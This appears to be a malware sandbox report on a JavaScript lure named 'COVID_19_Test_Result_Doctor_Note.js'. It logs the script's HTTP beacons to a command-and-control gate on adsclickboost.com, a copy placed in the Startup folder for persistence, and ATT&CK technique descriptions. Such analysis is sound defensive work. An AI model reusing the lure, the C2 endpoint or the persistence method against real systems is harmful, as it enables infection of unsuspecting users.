Mar 9, 2021 09:20:45.727435112 CET	1183	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:45.727569103 CET	1183	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:46.061866999 CET	1187	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d07fa19fbba1d2d1114ed583df8ba53bc1615278045; expires=Thu, 08-Apr-21 08:20:45 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac123d00002b16d009a000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=R81enhbviE1uA4sDJa41wOq9c4Cjriqtf7gaWrGCQNEq%2FBkKzFoJ1vZYdB8SBviwkF7%2Fj6i6gWiipLYBgLVN0rW%2F0RdV5u98mK9RkA1S2%2BR6BA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e2c9f80c2b16-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49733	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:47.999089003 CET	1188	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:47.999135017 CET	1189	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:48.327545881 CET	1189	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d3f9bbc8ce8bfc48de1086dfeb1d627bc1615278048; expires=Thu, 08-Apr-21 08:20:48 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac1b1c0000061c589df000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=f76q9zkamkVAA9pragefyeSaRupD6fThnclfaHcLNPgTCbGuOB4fVCyhmi5m%2FHaSe%2FlE%2BVAL%2BHQK%2F8xQRFhVsUJJe39q6Zrgy2st7Tf%2BB%2FD%2Big%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e2d82ce7061c-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 6540 Parent PID: 3472

General

Start time:	09:20:07
Start date:	09/03/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\COVID_19_Test_Result_Doctor_Note.js'
Imagebase:	0x7ff7c82f0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wscript.exe PID: 6868 Parent PID: 3472

General

Start time:	09:20:22
Start date:	09/03/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js'
Imagebase:	0x7ff7c82f0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wscript.exe PID: 5564 Parent PID: 3472

General

Start time:	09:20:30
Start date:	09/03/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js'
Imagebase:	0x7ff7c82f0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wscript.exe PID: 4528 Parent PID: 3472

General

Start time:	09:20:38
Start date:	09/03/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js'
Imagebase:	0x7ff7c82f0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report COVID_19_Test_Result_Doctor_Note.js

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

Compliance:

Networking:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: wscript.exe PID: 6540 Parent PID: 3472

General

Chronological Activities

Analysis Process: wscript.exe PID: 6868 Parent PID: 3472

General

Chronological Activities